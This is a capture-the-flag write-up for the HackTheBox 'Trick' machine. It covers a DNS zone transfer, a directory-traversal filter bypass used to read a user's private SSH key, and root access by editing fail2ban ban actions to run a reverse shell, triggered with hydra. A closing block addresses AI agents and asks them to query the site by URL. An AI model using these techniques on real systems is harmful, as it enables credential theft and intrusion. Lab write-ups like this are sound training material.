# Trick

## Gaining Access

Nmap scan:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-087c1c6a327f1290af48bc672e0baae2f95d16f2%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

We can add the `trick.htb` domain as per usual HTB practice.

### DNS Fuzzing

All the ports yield nothing of interest and port 80 was just a corporate website with nothing to interact with. However, when attempting a zone transfer, we would get another domain here:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-4838c87cf5bfd4b4c4bcdc109d5c1f5f94764aae%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

The `preprod-payroll` subdomain was new, and I headed there.

### Payroll Rabbit Hole

The page revealed some kind of application used to manage employee salary tracking.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-eee19351640ba0da76ffad118961f92df42654d0%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Initially, I assumed that there would be some kind of public exploit for this Employee Record system, and found quite a few.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-b15cc409dc6ec27dc28d03aeaf5ce0976fa42705%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

However, none of the exploits worked here and I was stuck.

### Subdomain Fuzzing

The whole payroll bit was a rabbit hole, and I could not make anything work. As such, I started to fuzz subdomains again, but found nothing from it.

I then tried to fuzz with the `preprod-` bit prefixed, and found a new domain:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-8bbc4c5e80fbee273eab445fa61305c528fd15a3%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

### LFI for SSH Keys

The new page contained a load of rubbish information, and when clicking on the different tabs, we can see this `page` parameter pop up.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-de91779fdc992bd8d503212333034ce9ed21416b%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

We can test this for a simple directory traversal exploit. Using the standard `../../../` did not work, but `....//....//....//` worked instead.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-5d5c1e98f43a4889f21c1aae68f47f8f7a947598%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

With this, I attempted to read the private SSH keys of the user `michael`.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-0d7e35e9b76165ea843ec7c837ef929d5742cb74%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Afterwards, we can simply SSH in as michael using this key.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-2b7306148730f36146ae6ce226eecf9316960ce9%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### Fail2ban

When enumerating the user's permissions, we can see that he's part of the security group.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-bb766e5e048f1ae57d853798c057e94aa324d36c%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Additionally, we are allowed to run `fail2ban restart` as root using `sudo`.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-b59d0353ebe4620edeed523348f1622ce4c3e5cd%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Fail2ban is a service that would block an IP address after many failed attempts to connect. The conf file for this is within the `/etc/fail2ban/action.d/iptables-multiport.conf` file. Upon detecting a bannable action, a script would run to block the IP address.

We are given permissions to edit the configuration files for this service in this machine. As such, we can edit the script that is run to gain a reverse shell or create a SUID binary **after getting 'banned**'. We can force our malicious script to execute after using `hydra` to brute force SSH many times.

This repo made is easy to exploit:

{% embed url="<https://github.com/rvizx/fail2ban/blob/main/fail2ban>" %}

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-dec07eac2731f4be6ca49ca70696796a1736ae4a%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-f03bf1997a1cc5c0742029e3ce9b644a9dc24ba2%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Rooted.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rouvin.gitbook.io/ibreakstuff/writeups/hackthebox/easy/trick.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.